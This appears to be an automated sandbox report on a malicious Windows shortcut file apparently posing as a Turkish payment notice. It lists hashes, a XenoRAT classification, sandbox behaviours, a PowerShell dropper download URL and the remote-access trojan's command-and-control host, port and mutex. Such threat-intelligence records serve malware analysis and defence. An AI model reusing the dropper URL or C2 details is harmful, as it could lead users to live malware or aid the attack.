Overview

overview

10

Static

static

1

Odeme -(Mayis).lnk

windows7-x64

10

Odeme -(Mayis).lnk

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Odeme -(Mayis).lnk.lnk

  • Size

    2KB

  • Sample

    240503-pqmymsed6v

  • MD5

    2ad899ef7b0d361186d8487950b7e167

  • SHA1

    151d04d656e68152cc2116b0837331a7df30eb27

  • SHA256

    2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618

  • SHA512

    2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b

Score
10/10
xenoratexecutionrattrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif

Extracted

Family

xenorat

C2

dns.requimacofradian.site

Mutex

Xeno_rat_nd8818g

Attributes
  • delay

    60000

  • install_path

    appdata

  • port

    1243

  • startup_name

    uic

Targets

    • Target

      Odeme -(Mayis).lnk.lnk

    • Size

      2KB

    • MD5

      2ad899ef7b0d361186d8487950b7e167

    • SHA1

      151d04d656e68152cc2116b0837331a7df30eb27

    • SHA256

      2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618

    • SHA512

      2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b

    Score
    10/10
    xenoratexecutionrattrojan

    • XenorRat

      XenorRat is a remote access trojan written in C#.

      trojanratxenorat

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks